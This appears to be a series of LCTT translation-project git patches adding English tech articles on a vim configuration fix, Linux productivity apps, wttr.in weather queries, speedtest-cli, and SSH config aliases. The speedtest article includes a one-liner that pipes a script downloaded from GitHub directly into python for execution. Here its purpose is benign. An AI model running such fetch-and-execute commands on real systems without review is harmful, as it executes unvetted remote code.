+The whole mess comes from the fact that, when there is no `~/.vimrc`, vim loads `defaults.vim` **after** `vimrc.local`, thus overwriting several settings put in there.
+
+There is a comment (which I didn't see, though) in `/etc/vim/vimrc` explaining this:
+```
+" Vim will load $VIMRUNTIME/defaults.vim if the user does not have a vimrc.
+" This happens after /etc/vim/vimrc(.local) are loaded, so it will override
+" any settings in these files.
+" If you don't want that to happen, uncomment the below line to prevent
+" defaults.vim from being loaded.
+" let g:skip_defaults_vim = 1
+```
+
+
+I agree that this is a good way to set up vim on a normal installation of Vim, but the Debian package could do better. The problem is laid out clearly in the bug report: if there is no `~/.vimrc`, settings in `/etc/vim/vimrc.local` are overwritten.
+
+This is as counterintuitive as it can be in Debian - and I don't know any other package that does it in a similar way.
+
+Since the settings in `defaults.vim` are quite reasonable, I want to have them and only fix the few items I disagree with, like the mouse. In the end, what I did is the following in my `/etc/vim/vimrc.local`:
+```
+if filereadable("/usr/share/vim/vim80/defaults.vim")
+ source /usr/share/vim/vim80/defaults.vim
+endif
+" now set the line that the defaults file is not reloaded afterwards!
+let g:skip_defaults_vim = 1
+
+" turn of mouse
+set mouse=
+" other override settings go here
+```
+
+
+There is probably a better way to get a generic load statement that does not depend on the Vim version, but for now I am fine with that.
+
+--------------------------------------------------------------------------------
+
+via: https://www.preining.info/blog/2017/10/fixing-vim-in-debian/
+
+作者:[Norbert Preining][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.preining.info/blog/author/norbert/
+[1]:https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=864074
+[2]:https://www.preining.info/blog/wp-content/uploads/2017/10/fixing-debian-vim.jpg
From 55752887f321cf01a3be5ab7e991d52e0c8191e0 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:41:30 +0800
Subject: [PATCH 017/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=2010=20Free=20Linux?=
=?UTF-8?q?=20Productivity=20Apps=20You=20Haven=E2=80=99t=20Heard=20Of?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... Productivity Apps You Haven-t Heard Of.md | 101 ++++++++++++++++++
1 file changed, 101 insertions(+)
create mode 100644 sources/tech/20171009 10 Free Linux Productivity Apps You Haven-t Heard Of.md
diff --git a/sources/tech/20171009 10 Free Linux Productivity Apps You Haven-t Heard Of.md b/sources/tech/20171009 10 Free Linux Productivity Apps You Haven-t Heard Of.md
new file mode 100644
index 0000000000..ed77417a7c
--- /dev/null
+++ b/sources/tech/20171009 10 Free Linux Productivity Apps You Haven-t Heard Of.md
@@ -0,0 +1,101 @@
+10 Free Linux Productivity Apps You Haven’t Heard Of
+======
+
+![](https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-00-Featured.jpg)
+
+Productivity apps can really make your work easier. If you are a Linux user, these 10 lesser-known free productivity apps for the Linux desktop can help you. As a matter of fact, keen Linux users may have heard of all the apps on the list, but for somebody who hasn't gone beyond the main apps, most of these should be unknown.
+
+### 1. Tomboy/Gnote
+
+![linux-productivity-apps-01-tomboy][1]
+
+[Tomboy][2] is a simple note-taking app. It's not for Linux only - you can get it for Unix, Windows, and macOS, too. Tomboy is pretty straightforward to use - you write a note, choose whether to make it sticky on your desktop, and delete it when you are done with it.
+
+### 2. MyNotex
+
+![linux-productivity-apps-02-mynotex][3]
+
+If you want a note-taker with more features but still prefer a small and simple app rather than a huge suite, check [MyNotex][4]. In addition to simple note taking and retrieval, it comes with some nice perks, such as formatting abilities, keyboard shortcuts, and attachments, to name a few. You can also use it as a picture manager.
+
+### 3. Trojitá
+
+![linux-productivity-apps-03-trojita][5]
+
+Though you can live without a desktop email client, if you are used to having one, out of the dozens that are available, try [Trojita][6]. It's good for productivity because it is a fast and lightweight email client, yet it offers all the basics (and more) a good email client must have.
+
+### 4. Kontact
+
+![linux-productivity-apps-04-kontact][7]
+
+A Personal Information Manager (PIM) is a great productivity tool. My personal preferences go to [Kontact][8]. Even though it hasn't been updated in years, it's still a very useful PIM tool to manage emails, address books, calendars, tasks, news feeds, etc. Kontact is a KDE native, but you can use it with other desktops as well.
+
+### 5. Osmo
+
+![linux-productivity-apps-05-osmo][9]
+
+[Osmo][10] is a much more up-to-date app with calendar, tasks, contacts, and notes functionality. It comes with some perks, such as encrypted private data backup and address locations on the map, as well as great search capabilities for notes, tasks, contacts, etc.
+
+### 6. Catfish
+
+![linux-productivity-apps-06-catfish][11]
+
+You can't be productive without a good searching tool. [Catfish][12] is one of the must-try search tools. It's a GTK+ tool and is very fast and lightweight. Catfish uses autocompletion from Zeitgeist, and you can also filter results by date and type.
+
+### 7. KOrganizer
+
+![linux-productivity-apps-07-korganizer][13]
+
+[KOrganizer][14] is the calendar and scheduling component of the Kontact app I mentioned above. If you don't need a full-fledged PIM app but only calendar and scheduling, you can go with KOrganizer instead. KOrganizer offers quick ToDo and quick event entry, as well as attachments for events and todos.
+
+### 8. Evolution
+
+![linux-productivity-apps-08-evolution][15]
+
+If you are not a fan of KDE apps but still need a good PIM, try GNOME's [Evolution][16]. Evolution is not exactly a less popular app you haven't heard of, but since it's useful, it made the list. Maybe you've heard about Evolution as an email client, but it's much more than that - you can use it to manage calendars, mail, address books and tasks.
+
+### 9. Freeplane
+
+![linux-productivity-apps-09-freeplane][17]
+
+I don't know if many of you use mind-mapping software on a daily basis, but if you do, check [Freeplane][18]. This is a free mind mapping and knowledge management software you can use for business or fun. You create notes, arrange them in clouds or charts, set tasks with calendars and reminders, etc.
+
+### 10. Calligra Flow
+
+![linux-productivity-apps-10-calligra-flow][19]
+
+Finally, if you need a flowchart and diagramming tool, try [Calligra Flow][20]. Think of it as the open source [alternative of Microsoft Visio][21], though Calligra Flow doesn't offer all the perks Visio offers. Still, you can use it to create network diagrams, organization charts, flowcharts and more.
+
+Productivity tools not only speed up work, but they also make you more organized. I bet there is hardly a person who doesn't use productivity tools in some form. Trying the apps listed here could make you more productive and could make your life at least a bit easier.
+
+--------------------------------------------------------------------------------
+
+via: https://www.maketecheasier.com/free-linux-productivity-apps-you-havent-heard-of/
+
+作者:[Ada Ivanova][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.maketecheasier.com/author/adaivanoff/
+[1]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-01-Tomboy.png (linux-productivity-apps-01-tomboy)
+[2]:https://wiki.gnome.org/Apps/Tomboy
+[3]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-02-MyNotex.jpg (linux-productivity-apps-02-mynotex)
+[4]:https://sites.google.com/site/mynotex/
+[5]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-03-Trojita.jpg (linux-productivity-apps-03-trojita)
+[6]:http://trojita.flaska.net/
+[7]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-04-Kontact.jpg (linux-productivity-apps-04-kontact)
+[8]:https://userbase.kde.org/Kontact
+[9]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-05-Osmo.jpg (linux-productivity-apps-05-osmo)
+[10]:http://clayo.org/osmo/
+[11]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-06-Catfish.png (linux-productivity-apps-06-catfish)
+[12]:http://www.twotoasts.de/index.php/catfish/
+[13]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-07-KOrganizer.jpg (linux-productivity-apps-07-korganizer)
+[14]:https://userbase.kde.org/KOrganizer
+[15]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-08-Evolution.jpg (linux-productivity-apps-08-evolution)
+[16]:https://help.gnome.org/users/evolution/3.22/intro-main-window.html.en
+[17]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-09-Freeplane.jpg (linux-productivity-apps-09-freeplane)
+[18]:https://www.freeplane.org/wiki/index.php/Home
+[19]:https://www.maketecheasier.com/assets/uploads/2017/09/Linux-productivity-apps-10-Calligra-Flow.jpg (linux-productivity-apps-10-calligra-flow)
+[20]:https://www.calligra.org/flow/
+[21]:https://www.maketecheasier.com/5-best-free-alternatives-to-microsoft-visio/
From fe972b99260d7fae07e529aa5b8fc58884cdbad8 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:45:31 +0800
Subject: [PATCH 018/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Get=20Your=20Weat?=
=?UTF-8?q?her=20Forecast=20From=20the=20Linux=20CLI?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...our Weather Forecast From the Linux CLI.md | 140 ++++++++++++++++++
1 file changed, 140 insertions(+)
create mode 100644 sources/tech/20171013 Get Your Weather Forecast From the Linux CLI.md
diff --git a/sources/tech/20171013 Get Your Weather Forecast From the Linux CLI.md b/sources/tech/20171013 Get Your Weather Forecast From the Linux CLI.md
new file mode 100644
index 0000000000..07547654cf
--- /dev/null
+++ b/sources/tech/20171013 Get Your Weather Forecast From the Linux CLI.md
@@ -0,0 +1,140 @@
+translating by lujun9972
+Get Your Weather Forecast From the Linux CLI
+======
+
+### Objective
+
+Display the current weather forecast in the Linux command line.
+
+### Distributions
+
+This will work on any Linux distribution.
+
+### Requirements
+
+A working Linux install with an Internet connection.
+
+### Difficulty
+
+Easy
+
+### Conventions
+
+ * **#** \- requires given command to be executed with root privileges either directly as a root user or by use of `sudo` command
+ * **$** \- given command to be executed as a regular non-privileged user
+
+
+
+### Introduction
+
+It would be convenient to be able to retrieve the latest weather forecast right from your terminal without opening up a web browser, wouldn't it? What about scripting it or setting up a cron job? Well, you can.
+
+`http://wttr.in` is a website that allows you to search for weather forecasts anywhere in the world, and it displays the results in ASCII characters. By using `cURL` to access `http://wttr.in`, you can get the results directly in your terminal.
+
+### Get Your Local Weather
+
+
+
+![Local weather from wttr.in][1]
+It's really simple to grab your local weather. `wttr.in` will automatically try to detect your location based on your IP address. It's reasonably accurate, unless you're using a VPN, of course.
+```
+
+$ curl wttr.in
+
+```
+
+### Get Weather By City
+
+
+
+![Weather by city from wttr.in][2]
+Now, if you would like the weather in a different city, you can specify that with a slash at the end of `wttr.in`. Replace any spaces in the name with a `+`.
+```
+
+$ curl wttr.in/New+York
+
+```
+
+You can also specify cities the way they're written in Unix timezones.
+```
+
+$ curl wttr.in/New_York
+
+```
+
+Don't use spaces unless you like strange and inaccurate results.
+
+### Get Weather By Airport
+
+
+
+![Weather by airport from wttr.in][3]
+If you're familiar with the three letter airport codes in your area, you can use those too. They might be closer to you and more accurate than the city in general.
+```
+
+$ curl wttr.in/JFK
+
+```
+
+### Best Guess
+
+
+
+![Weather by landmark from wttr.in][4]
+You can have `wttr.in` take a guess at the weather based on a landmark using the `~` character.
+```
+
+$ curl wttr.in/~Statue+Of+Liberty
+
+```
+
+### Weather From A Domain Name
+
+
+
+![Weather by domain name from wttr.in][5]
+Did you ever wonder what the weather is like where LinuxConfig is hosted? Now you can find out! `wttr.in` can check the weather by domain name. Sure, it's probably not the most useful feature, but it's interesting nonetheless.
+```
+
+$ curl wttr.in/@linuxconfig.org
+
+```
+
+### Changing The Temperature Units
+
+
+
+![Change unit system in wttr.in][6]
+By default, `wttr.in` will display temperatures in the units (C or F) used in your actual location. Basically, in the States you'll get Fahrenheit, and everyone else will see Celsius. You can change that by adding `?u` to see Fahrenheit or `?m` to see Celsius.
+```
+
+$ curl wttr.in/New_York?m
+
+$ curl wttr.in/Toronto?u
+
+```
+
+There's an odd bug with ZSH that prevents this from working, so you need to use Bash if you want to convert the units.
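+
+If you would rather stay in ZSH, quoting the URL so the shell does not try to expand the `?` as a glob character should also work; a small sketch of that workaround:
+```
+
+$ curl 'wttr.in/Toronto?u'
+
+```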
+
+### Closing Thoughts
+
+You can easily incorporate a call to `wttr.in` into a script, cron job, or even your MOTD. Of course, you don't need to get that involved. You can just lazily type a call in to this awesome service whenever you want to check the forecast.
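+
+For example, a crontab entry along these lines would refresh a cached forecast every hour, which a script or MOTD snippet could then display (the city is from the examples above; the output path is just a placeholder):
+```
+
+# refresh a cached forecast every hour; the output path is a placeholder
+0 * * * * curl -s wttr.in/New_York?m > /tmp/forecast.txt
+
+```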
+
+
+--------------------------------------------------------------------------------
+
+via: https://linuxconfig.org/get-your-weather-forecast-from-the-linux-cli
+
+作者:[Nick Congleton][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://linuxconfig.org
+[1]:https://linuxconfig.org/images/wttr-local.jpg
+[2]:https://linuxconfig.org/images/wttr-city.jpg
+[3]:https://linuxconfig.org/images/wttr-airport.jpg
+[4]:https://linuxconfig.org/images/wttr-landmark.jpg
+[5]:https://linuxconfig.org/images/wttr-url.jpg
+[6]:https://linuxconfig.org/images/wttr-units.jpg
From 94c5a5ec7aed26a826241c5097ef06c2651983b5 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:53:04 +0800
Subject: [PATCH 019/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20test?=
=?UTF-8?q?=20internet=20speed=20in=20Linux=20terminal?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...o test internet speed in Linux terminal.md | 175 ++++++++++++++++++
1 file changed, 175 insertions(+)
create mode 100644 sources/tech/20171010 How to test internet speed in Linux terminal.md
diff --git a/sources/tech/20171010 How to test internet speed in Linux terminal.md b/sources/tech/20171010 How to test internet speed in Linux terminal.md
new file mode 100644
index 0000000000..73e0a7f236
--- /dev/null
+++ b/sources/tech/20171010 How to test internet speed in Linux terminal.md
@@ -0,0 +1,175 @@
+How to test internet speed in Linux terminal
+======
+Learn how to use the speedtest CLI tool to test internet speed in the Linux terminal. Also includes a one-liner python command to get speed details right away.
+
+![test internet speed in linux terminal][1]
+
+Most of us check the internet bandwidth speed whenever we connect to a new network or Wi-Fi, so why not our servers! Here is a tutorial which will walk you through testing internet speed in the Linux terminal.
+
+Every one of us generally uses [Speedtest by Ookla][2] to check internet speed. It's a pretty simple process on a desktop: go to their website and just click the GO button. It will scan your location and run a speed test against the nearest server. If you are on mobile, they have an app for you. But if you are on a terminal with a command-line interface, things are a little different. Let's see how to check internet speed from the Linux terminal.
+
+If you want to check the speed only once and don't want to download the tool onto the server, jump ahead and see the one-liner command.
+
+### Step 1 : Download speedtest cli tool
+
+First of all, download the speedtest CLI tool from its [github repository][3]. Nowadays, it's also included in many well-known Linux repositories; if it's there in yours, you can directly [install that package on your Linux distro][4].
+
+Let's proceed with the GitHub download and install process. [Install the git package][4] depending on your distro, then clone the GitHub repo of speedtest like below:
+
+```
+[root@kerneltalks ~]# git clone https://github.com/sivel/speedtest-cli.git
+Cloning into 'speedtest-cli'...
+remote: Counting objects: 913, done.
+remote: Total 913 (delta 0), reused 0 (delta 0), pack-reused 913
+Receiving objects: 100% (913/913), 251.31 KiB | 143.00 KiB/s, done.
+Resolving deltas: 100% (518/518), done.
+
+```
+
+It will be cloned into your present working directory. A new directory named `speedtest-cli` will be created, and you can see the following files in it.
+
+```
+[root@kerneltalks ~]# cd speedtest-cli
+[root@kerneltalks speedtest-cli]# ll
+total 96
+-rw-r--r--. 1 root root 1671 Oct 7 16:55 CONTRIBUTING.md
+-rw-r--r--. 1 root root 11358 Oct 7 16:55 LICENSE
+-rw-r--r--. 1 root root 35 Oct 7 16:55 MANIFEST.in
+-rw-r--r--. 1 root root 5215 Oct 7 16:55 README.rst
+-rw-r--r--. 1 root root 20 Oct 7 16:55 setup.cfg
+-rw-r--r--. 1 root root 3196 Oct 7 16:55 setup.py
+-rw-r--r--. 1 root root 2385 Oct 7 16:55 speedtest-cli.1
+-rw-r--r--. 1 root root 1200 Oct 7 16:55 speedtest_cli.py
+-rwxr-xr-x. 1 root root 47228 Oct 7 16:55 speedtest.py
+-rw-r--r--. 1 root root 333 Oct 7 16:55 tox.ini
+```
+
+The python script `speedtest.py` is the one we will be using to check internet speed.
+
+You can link this script to a command in /usr/bin so that all users on the server can use it, or you can create a [command alias][5] for it so it is easy for all users to run.
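+
+A minimal sketch of both approaches (paths assume the clone location used above):
+
+```
+# make the script available system-wide as a single command (run as root, as in the clone above)
+ln -s /root/speedtest-cli/speedtest.py /usr/bin/speedtest
+# or give users a shell alias instead
+echo "alias speedtest='python /root/speedtest-cli/speedtest.py'" >> ~/.bashrc
+```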
+
+### Step 2 : Run python script
+
+Now, run the python script without any arguments. It will search for the nearest server and test your internet speed.
+
+```
+[root@kerneltalks speedtest-cli]# python speedtest.py
+Retrieving speedtest.net configuration...
+Testing from Amazon (35.154.184.126)...
+Retrieving speedtest.net server list...
+Selecting best server based on ping...
+Hosted by Spectra (Mumbai) [1.15 km]: 8.174 ms
+Testing download speed................................................................................
+Download: 548.13 Mbit/s
+Testing upload speed................................................................................................
+Upload: 323.95 Mbit/s
+```
+
+Oh! Don't be amazed by the speed. 😀 I am on an [AWS EC2 Linux server][6]. That's the bandwidth of the Amazon data center! 🙂
+
+### Different options with script
+
+A few options which might be useful are listed below:
+
+ **To search for speedtest servers** near your location, use the `--list` switch and `grep` for your location name.
+
+```
+[root@kerneltalks speedtest-cli]# python speedtest.py --list | grep -i mumbai
+ 2827) Bharti Airtel Ltd (Mumbai, India) [1.15 km]
+ 8978) Spectra (Mumbai, India) [1.15 km]
+ 4310) Hathway Cable and Datacom Ltd (Mumbai, India) [1.15 km]
+ 3315) Joister Broadband (Mumbai, India) [1.15 km]
+ 1718) Vodafone India (Mumbai, India) [1.15 km]
+ 6454) YOU Broadband India Pvt Ltd. (Mumbai, India) [1.15 km]
+ 9764) Railtel Corporation of india Ltd (Mumbai, India) [1.15 km]
+ 9584) Sheng Li Telecom (Mumbai, India) [1.15 km]
+ 7605) Idea Cellular Ltd. (Mumbai, India) [1.15 km]
+ 8122) Sify Technologies Ltd (Mumbai, India) [1.15 km]
+ 9049) I-ON (Mumbai, India) [1.15 km]
+ 6403) YOU Broadband India Pvt Ltd., Mumbai (Mumbai, India) [1.15 km]
+```
+
+You can see here that the first column is the server identifier, followed by the name of the company hosting that server, the location and finally its distance from your location.
+
+ **To test internet speed using a specific server** , use the `--server` switch with a server identifier from the previous output as the argument.
+
+```
+[root@kerneltalks speedtest-cli]# python speedtest.py --server 2827
+Retrieving speedtest.net configuration...
+Testing from Amazon (35.154.184.126)...
+Retrieving speedtest.net server list...
+Selecting best server based on ping...
+Hosted by Bharti Airtel Ltd (Mumbai) [1.15 km]: 13.234 ms
+Testing download speed................................................................................
+Download: 93.47 Mbit/s
+Testing upload speed................................................................................................
+Upload: 69.25 Mbit/s
+```
+
+**To get a share link for your speed test** , use the `--share` switch. It will give you the URL of your test result hosted on the speedtest website, which you can share.
+
+```
+[root@kerneltalks speedtest-cli]# python speedtest.py --share
+Retrieving speedtest.net configuration...
+Testing from Amazon (35.154.184.126)...
+Retrieving speedtest.net server list...
+Selecting best server based on ping...
+Hosted by Spectra (Mumbai) [1.15 km]: 7.471 ms
+Testing download speed................................................................................
+Download: 621.00 Mbit/s
+Testing upload speed................................................................................................
+Upload: 367.37 Mbit/s
+Share results: http://www.speedtest.net/result/6687428141.png
+
+```
+
+Observe the last line, which includes the URL of your test result. If I download that image, it's the one below:
+
+![Speedtest result on Linux][7]
+
+That's it! But hey, if you don't want all this technical jargon, you can even use the below one-liner to get a speed test done right away.
+
+### Internet speed test using one liner in terminal
+
+We are going to use the [curl tool][8] to fetch the above python script over the network and pipe it to python for execution on the fly!
+
+```
+[root@kerneltalks ~]# curl -s https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py | python -
+```
+
+The above command will run the script and show you the result on screen!
+
+```
+[root@kerneltalks speedtest-cli]# curl -s https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py | python -
+Retrieving speedtest.net configuration...
+Testing from Amazon (35.154.184.126)...
+Retrieving speedtest.net server list...
+Selecting best server based on ping...
+Hosted by Spectra (Mumbai) [1.15 km]: 12.599 ms
+Testing download speed................................................................................
+Download: 670.88 Mbit/s
+Testing upload speed................................................................................................
+Upload: 355.84 Mbit/s
+```
+
+I tested this tool on a RHEL 7 server, but the process is the same on Ubuntu, Debian, Fedora or CentOS.
+
+--------------------------------------------------------------------------------
+
+via: https://kerneltalks.com/tips-tricks/how-to-test-internet-speed-in-linux-terminal/
+
+作者:[Shrikant Lavhate][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://kerneltalks.com
+[1]:https://c1.kerneltalks.com/wp-content/uploads/2017/10/check-internet-speed-from-Linux.png
+[2]:http://www.speedtest.net/
+[3]:https://github.com/sivel/speedtest-cli
+[4]:https://kerneltalks.com/tools/package-installation-linux-yum-apt/
+[5]:https://kerneltalks.com/commands/command-alias-in-linux-unix/
+[6]:https://kerneltalks.com/howto/install-ec2-linux-server-aws-with-screenshots/
+[7]:https://c3.kerneltalks.com/wp-content/uploads/2017/10/speedtest-on-linux.png
+[8]:https://kerneltalks.com/tips-tricks/4-tools-download-file-using-command-line-linux/
From 7b4244b78217fd348fed0bcfcb91bbb232d4c7ef Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:58:02 +0800
Subject: [PATCH 020/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=205=20SSH=20alias?=
=?UTF-8?q?=20examples=20in=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../20171016 5 SSH alias examples in Linux.md | 192 ++++++++++++++++++
1 file changed, 192 insertions(+)
create mode 100644 sources/tech/20171016 5 SSH alias examples in Linux.md
diff --git a/sources/tech/20171016 5 SSH alias examples in Linux.md b/sources/tech/20171016 5 SSH alias examples in Linux.md
new file mode 100644
index 0000000000..ddf92f1cc0
--- /dev/null
+++ b/sources/tech/20171016 5 SSH alias examples in Linux.md
@@ -0,0 +1,192 @@
+5 SSH alias examples in Linux
+======
+[![][1]][1]
+
+As Linux users, we use the [ssh command][2] to log in to remote machines. The more you use the ssh command, the more time you waste typing the same long commands. We can use either an [alias defined in your .bashrc file][3] or shell functions to minimize the time spent on the CLI, but an even better solution is to use an **SSH alias** in the SSH config file.
+
+Here are a couple of examples where we can improve the ssh commands we use.
+
+Connecting over SSH to an AWS instance is a pain. Typing out the full command with user, key file and long hostname every time is a complete waste of your time as well. With an alias it can be shortened to:
+```
+ssh aws1
+```
+
+The same goes for connecting to a system while debugging; that too can be reduced to:
+```
+ssh xyz
+```
+
+In this post, we will see how to shorten your ssh commands without using bash aliases or functions. The main advantage of an ssh alias is that all your ssh command shortcuts are stored in a single file that is easy to maintain. The other advantage is that we can use the same alias **for both SSH and SCP commands alike**.
+
+Before we jump into the actual configuration, we should know the difference between the /etc/ssh/ssh_config, /etc/ssh/sshd_config, and ~/.ssh/config files. Below is an explanation of these files.
+
+## Difference between /etc/ssh/ssh_config and ~/.ssh/config
+
+System-level SSH configuration is stored in /etc/ssh/ssh_config, whereas user-level SSH configuration is stored in the ~/.ssh/config file.
+
+## Difference between /etc/ssh/ssh_config and /etc/ssh/sshd_config
+
+System-level SSH configuration is stored in /etc/ssh/ssh_config, whereas system-level SSH server configuration is stored in the /etc/ssh/sshd_config file.
+
+## Syntax for configuration in the ~/.ssh/config file
+
+The syntax for ~/.ssh/config entries is:
+```
+config val
+config val1 val2
+```
+
+**Example 1:** Create an SSH alias for a host (www.linuxnix.com)
+
+Edit the file ~/.ssh/config with the following content:
+```
+Host tlj
+ User root
+ HostName 18.197.176.13
+ port 22
+```
+
+Save the file.
+
+The above SSH alias uses:
+
+ 1. **tlj as the alias name**
+ 2. **root as the user who will log in**
+ 3. **18.197.176.13 as the host IP address**
+ 4. **22 as the port to access the SSH service**
+
+
+
+Output:
+```
+sanne@Surendras-MacBook-Pro:~ > ssh tlj
+Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-93-generic x86_64)
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+ Get cloud support with Ubuntu Advantage Cloud Guest:
+ http://www.ubuntu.com/business/services/cloud
+Last login: Sat Oct 14 01:00:43 2017 from 20.244.25.231
+root@linuxnix:~# exit
+logout
+Connection to 18.197.176.13 closed.
+```
+
+**Example 2:** Use an SSH key to log in to the system without a password, using **IdentityFile**.
+
+Example:
+```
+Host aws
+ User ec2-users
+ HostName ec2-54-200-184-202.us-west-2.compute.amazonaws.com
+ IdentityFile ~/Downloads/surendra.pem
+ port 22
+```
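+
+With that entry in place, both logging in and copying files become short. A quick usage sketch (the alias is from the entry above; the file name is a placeholder):
+```
+# log in using the alias instead of the full user/host/key incantation
+ssh aws
+# copy a local file (placeholder name) to the instance using the same alias
+scp backup.tar.gz aws:/tmp/
+```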
+
+**Example 3:** Use different aliases for the same host. In the below example, we use **tlj, linuxnix, linuxnix.com** for the same IP/hostname 18.197.176.13.
+
+~/.ssh/config file content
+```
+Host tlj linuxnix linuxnix.com
+ User root
+ HostName 18.197.176.13
+ port 22
+```
+
+**Output:**
+```
+sanne@Surendras-MacBook-Pro:~ > ssh tlj
+Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-93-generic x86_64)
+* Documentation: https://help.ubuntu.com
+* Management: https://landscape.canonical.com
+* Support: https://ubuntu.com/advantage
+Get cloud support with Ubuntu Advantage Cloud Guest:
+http://www.ubuntu.com/business/services/cloud
+Last login: Sat Oct 14 01:00:43 2017 from 220.244.205.231
+root@linuxnix:~# exit
+logout
+Connection to 18.197.176.13 closed.
+sanne@Surendras-MacBook-Pro:~ > ssh linuxnix.com
+Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-93-generic x86_64)
+* Documentation: https://help.ubuntu.com
+* Management: https://landscape.canonical.com
+* Support: https://ubuntu.com/advantage
+Get cloud support with Ubuntu Advantage Cloud Guest:
+http://www.ubuntu.com/business/services/cloud
+Last login: Sun Oct 15 20:31:08 2017 from 1.129.110.13
+root@linuxnix:~# exit
+logout
+Connection to 138.197.176.103 closed.
+[6571] sanne@Surendras-MacBook-Pro:~ > ssh linuxnix
+Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-93-generic x86_64)
+* Documentation: https://help.ubuntu.com
+* Management: https://landscape.canonical.com
+* Support: https://ubuntu.com/advantage
+Get cloud support with Ubuntu Advantage Cloud Guest:
+http://www.ubuntu.com/business/services/cloud
+Last login: Sun Oct 15 20:31:20 2017 from 1.129.110.13
+root@linuxnix:~# exit
+logout
+Connection to 18.197.176.13 closed.
+```
+
+**Example 4:** Copy a file to a remote system using the same SSH alias.
+
+Syntax:
+```
+scp <file> <ssh-alias>:<remote-path>
+```
+
+Example:
+```
+sanne@Surendras-MacBook-Pro:~ > scp abc.txt tlj:/tmp
+abc.txt 100% 12KB 11.7KB/s 00:01
+sanne@Surendras-MacBook-Pro:~ >
+```
+
+As we have already set up the SSH host alias, using SCP is a breeze, since both ssh and scp use almost the same syntax and options.
+
+To copy a file from the local machine to the remote one, use the alias in place of the hostname, just as shown above.
+
+**Example 5:** Resolve SSH timeout issues in Linux. By default, your ssh sessions time out if you don't actively use the terminal.
+
+[SSH timeouts][5] are one more pain point where you have to log in to a remote machine again after a certain time. We can set the SSH timeout right inside your ~/.ssh/config file to keep your session alive for as long as you want. To achieve this we will use two SSH options for keeping the session alive: ServerAliveInterval sends a keep-alive message to the server every given number of seconds, and ServerAliveCountMax sets how many of those messages may go unanswered before the connection is dropped.
+```
+ServerAliveInterval A
+ServerAliveCountMax B
+```
+
+**Example:**
+```
+Host tlj linuxnix linuxnix.com
+ User root
+ HostName 18.197.176.13
+ port 22
+ ServerAliveInterval 60
+ ServerAliveCountMax 30
+```
+
+We will see some other exciting howtos in our next posts. Keep visiting linuxnix.com.
+
+--------------------------------------------------------------------------------
+
+via: https://www.linuxnix.com/5-ssh-alias-examples-using-ssh-config-file/
+
+作者:[Surendra Anne;Max Ntshinga;Otto Adelfang;Uchechukwu Okeke][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linuxnix.com
+[1]:https://www.linuxnix.com/wp-content/uploads/2017/10/SSH-alias-1.png
+[2]:https://www.linuxnix.com/ssh-access-remote-linux-server/
+[3]:https://www.linuxnix.com/linux-alias-command-explained-with-examples/
+[5]:https://www.linuxnix.com/how-to-auto-logout/
From 19ab2010636fe71e650b4a090777ce0e64b87d15 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:59:54 +0800
Subject: [PATCH 021/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Using=20the=20Lin?=
=?UTF-8?q?ux=20find=20command=20with=20caution?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ing the Linux find command with caution.md | 93 +++++++++++++++++++
1 file changed, 93 insertions(+)
